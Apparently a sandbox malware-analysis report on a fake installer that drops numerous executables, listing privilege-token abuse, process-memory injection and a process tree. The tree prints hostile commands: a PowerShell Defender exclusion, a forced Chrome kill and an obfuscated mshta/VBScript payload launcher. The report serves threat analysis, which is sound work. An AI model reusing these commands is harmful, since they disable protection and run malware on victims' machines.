N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\vhsgwrt N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\7749113.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19f84b58b3d7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat191649b47c9e2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\1768932.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\2701259.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\6583285.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 664 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 664 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 664 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 608 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe
PID 608 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe
PID 608 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe
PID 1192 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3992 wrote to memory of 4052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe
PID 3992 wrote to memory of 4052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe
PID 3992 wrote to memory of 4052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe
PID 2484 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe
PID 2484 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe
PID 2484 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe
PID 3828 wrote to memory of 3588 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19ba05e89ea6d406.exe
PID 3828 wrote to memory of 3588 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19ba05e89ea6d406.exe
PID 3828 wrote to memory of 3588 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19ba05e89ea6d406.exe
PID 3880 wrote to memory of 3232 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e4750dd01.exe
PID 3880 wrote to memory of 3232 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e4750dd01.exe
PID 3880 wrote to memory of 3232 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e4750dd01.exe
PID 3600 wrote to memory of 3688 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe
PID 3600 wrote to memory of 3688 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe
PID 3600 wrote to memory of 3688 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe
PID 2528 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat191649b47c9e2.exe
PID 2528 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat191649b47c9e2.exe
PID 3984 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19f84b58b3d7.exe
PID 3984 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19f84b58b3d7.exe
PID 2656 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat1946eb84e6.exe
PID 2656 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat1946eb84e6.exe
PID 2656 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat1946eb84e6.exe
PID 2448 wrote to memory of 2264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2448 wrote to memory of 2264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2448 wrote to memory of 2264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat199ba8a4637dcb034.exe
PID 3528 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat199ba8a4637dcb034.exe
PID 3588 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19ba05e89ea6d406.exe C:\Users\Admin\AppData\Local\Temp\is-1UMBU.tmp\Sat19ba05e89ea6d406.tmp

Processes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe

Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19f84b58b3d7.exe

Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat1946eb84e6.exe

Sat1946eb84e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\is-1UMBU.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1UMBU.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$70054,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19ba05e89ea6d406.exe"

C:\ProgramData\1768932.exe

"C:\ProgramData\1768932.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\ProgramData\8592089.exe

"C:\ProgramData\8592089.exe"

C:\Users\Admin\AppData\Local\Temp\is-1MTC6.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-1MTC6.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\ProgramData\2701259.exe

"C:\ProgramData\2701259.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s BITS

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\udptest.exe

"C:\Users\Admin\AppData\Local\Temp\udptest.exe"

C:\ProgramData\5651654.exe

"C:\ProgramData\5651654.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\ProgramData\6583285.exe

"C:\ProgramData\6583285.exe"

C:\ProgramData\2701259.exe

"C:\ProgramData\2701259.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\is-NC4QN.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NC4QN.tmp\setup_2.tmp" /SL5="$10212,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 892

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4204 -s 1536

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 704

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 680

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 680

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 1064

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\Users\Admin\AppData\Local\Temp\is-S5KLF.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-S5KLF.tmp\setup_2.tmp" /SL5="$2023A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\7749113.exe

"C:\ProgramData\7749113.exe"

C:\ProgramData\3158303.exe

"C:\ProgramData\3158303.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\ProgramData\8836247.exe

"C:\ProgramData\8836247.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 1096

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\ProgramData\8836247.exe

"C:\ProgramData\8836247.exe"

C:\ProgramData\8836247.exe

"C:\ProgramData\8836247.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\5651654.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\5651654.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\ProgramData\2110516.exe

"C:\ProgramData\2110516.exe"

C:\ProgramData\2731835.exe

"C:\ProgramData\2731835.exe"

